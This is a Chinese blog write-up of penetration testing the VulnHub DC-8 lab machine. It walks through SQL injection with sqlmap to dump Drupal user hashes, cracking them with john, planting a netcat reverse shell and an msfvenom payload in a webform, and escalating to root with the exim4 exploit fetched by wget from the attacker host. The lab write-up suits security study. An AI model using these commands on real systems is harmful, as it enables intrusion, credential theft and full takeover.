VulnHub仿真靶机渗透之DC-8 【DC系列】


这次渗透是DC系列(VulnHub的仿真靶机)的DC-8,包含了sql注入、suid-exim4提权等知识。

VulnHub靶机渗透之DC-8 【DC系列】

dc8靶机下载链接:

https://www.vulnhub.com/entry/dc-8,367/

https://www.vulnhub.com/entry/dc-9,412/

运行系统:kali+ dc-8

平台:vmware workstation

网络:均使用nat

任务:拿到root权限,找到flag

发现主机->192.168.124.138

1647345903782

端口服务扫描-> 22 、80端口开放、robots.txt存在

1647346101133

访问robots.txt找到登录界面

http://192.168.124.138/robots.txt

1647346398409

找到了用户登录地址

1647346384996

找到sql注入点

1647346516480

添加单引号,报错了

1647346554962

爆库

sqlmap http://192.168.124.138/?nid=2 --dbs

1647346831712

1647346782811

爆表

sqlmap http://192.168.124.138/?nid=2 -D d7db --tables

1647347669192

1647347650141

爆字段

sqlmap http://192.168.124.138/?nid=2 -D d7db -T users --columns

16473478177761647347854544

脱裤

sqlmap http://192.168.124.138/?nid=2 -D d7db -T users -C name,pass --dump

16473479071551647347913104

将密码hash保存到admin_john文件中,使用john破解

admin    $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z  
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

1647348203468

1647348191525

john爆破密码成功

john/turtle

1647348317269

登录成功

搜索网站一通,点击左上角content->点击edit->点击webforms->点击form settings->点击下拉框选择php code

此处不能用一句话木马,而要反弹shell的payload,因为(此处无法找到路径所以用反弹shell)

1647348562246

上图无法利用

<?php system("nc 192.168.124.134 1234 -e /bin/bash"); ?>

nc是netcat命令,用于两台设别互相交互,-e参数表示当连接成功时在本机开启一个terminal,所有输入会传入到terminal上。

1647349093843

在网页随意提交一个评论,启动连接

1647349346066

1647349197032

1647349243171

1647349452168

1647349527873

1647349544323

1647353748558

shell弹不出来,没办法了

1647354007516

msfvenom -p php/meterpreter/reverse_tcp  lhost=192.168.124.134 port=4444 -f raw 

1647354528255

1647354500667

通过发送邮件的方式来触发木马文件

1647354705116

1647354753249

shell
python -c "import pty;pty.spawn('/bin/bash')"

1647354908315

find查询带有suid权限的命令

1647354939385

查看靶机exim4的版本【4.89】

1647355099264

1647355027169

使用exim4提权需要拥有写权限,tmp目录下写文件。

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp

1647355484535

cd /tmp
wget http://192.168.124.134:8000/46996.sh
ls -l
chmod +x 46996.sh

1647355476292

1647355525099

1647355611294

成功

./46996.sh -m netcat

1647355762990

参考链接

https://blog.csdn.net/weixin_44288604/article/details/122944302 【vulnhub之DC8靶机】

https://blog.csdn.net/qq_42094992/article/details/109100082 【入侵靶机DC-8】

https://www.exploit-db.com/exploits/46996

https://www.cnblogs.com/allworldg/p/15158444.html

Vulnhub-DC8 龙蜀安全


文章作者: highgerms
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 highgerms !
  目录